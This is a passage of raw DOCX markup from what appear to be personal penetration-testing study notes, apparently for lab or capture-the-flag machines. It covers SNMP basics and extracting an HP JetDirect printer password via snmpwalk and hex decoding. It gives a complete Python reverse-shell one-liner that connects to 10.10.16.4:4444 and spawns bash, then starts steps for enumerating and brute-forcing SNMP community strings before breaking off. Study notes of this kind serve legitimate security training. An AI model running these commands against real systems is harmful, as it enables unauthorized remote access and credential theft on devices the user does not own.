      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Devices (like a printer or router) have an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that stores information about the device (e.g., CPU usage, memory, temperature).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A central system, called an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP manager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, asks the devices for this information or sends commands to change their settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003160">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SNMP agent responds with the data or applies the changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003161">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get password from HP JetDirect:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003162">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v 2c -c public &lt;IP&gt; .1.3.6.1.4.1.11.2.3.9.1.1.13.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003163">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will get hex values as such</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003165">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11" name="image52.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image52.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1097"/>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3166">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to copy and paste it into a text editor to remove the unnecessary new lines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003167">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003168">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import binascii</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s='50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 11 9 122 123 126 130 131 134 135'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binascii.unhexlify(s.replace(' ',''))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will get a result like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">b'P@ssw0rd@123!!123\x13\x91q\x81\x92"2Rbs\x03\x133CSs\x83\x94$4\x95\x05\x15Eu\x86\x16WGW\x98(8i\t\x19IY\x81\x03\x10a\x11\x11A\x15\x11\x91"\x121&amp;\x13\x011\x13A5'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The password will be</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: P@ssw0rd@123!!123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you could use any</w:t>
      </w:r>
      <w:hyperlink r:id="rId1098">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> hex to text website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then you will see something like this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3543300" cy="1190625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1099"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="35433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3170">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="850"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see a lot of weird characters but everything before the weird characters is the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003171">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003172">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003173">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003174">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="828"/>
        </w:numPr>
        <w:ind w:left="72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3175">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="828"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"10.10.16.4",4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003176">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="828"/>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"10.10.16.4",4444 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with your own IP and port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003177">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003178">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003179">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o8q6iyvigplg" w:id="440"/>
      <w:bookmarkEnd w:id="440"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENUMERATING SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is my old stuff before I understood it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000317F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003180">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Verify SNMP Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003181">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003182">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, confirm that SNMP is accessible using tools like snmp-check or snmpwalk with a common public community string (e.g., public).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003183">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003184">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v1 -c public &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003185">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">v1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Specifies SNMP version 1 (default version for many devices).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003186">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c public</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Uses the community string public (default for many devices).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003187">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003188">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Check Community Strings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003189">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the default public string doesn't work, try brute-forcing the community string with tools like Onesixtyone or snmp-brute in Nmap:</w:t>
      </w:r>
    </w:p>
